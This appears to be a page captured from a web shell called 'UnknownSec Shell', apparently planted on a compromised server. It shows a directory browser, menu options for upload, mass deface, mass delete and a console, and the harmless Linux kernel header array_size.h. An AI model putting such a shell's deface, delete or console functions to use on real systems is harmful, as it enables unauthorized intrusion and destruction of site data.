shell bypass 403
UnknownSec Shell
:
/
usr
/
src
/
linux-headers-6.8.0-83
/
include
/
linux
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
array_size.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef _LINUX_ARRAY_SIZE_H #define _LINUX_ARRAY_SIZE_H #include <linux/compiler.h> /** * ARRAY_SIZE - get the number of elements in array @arr * @arr: array to be sized */ #define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0]) + __must_be_array(arr)) #endif /* _LINUX_ARRAY_SIZE_H */
© 2026 UnknownSec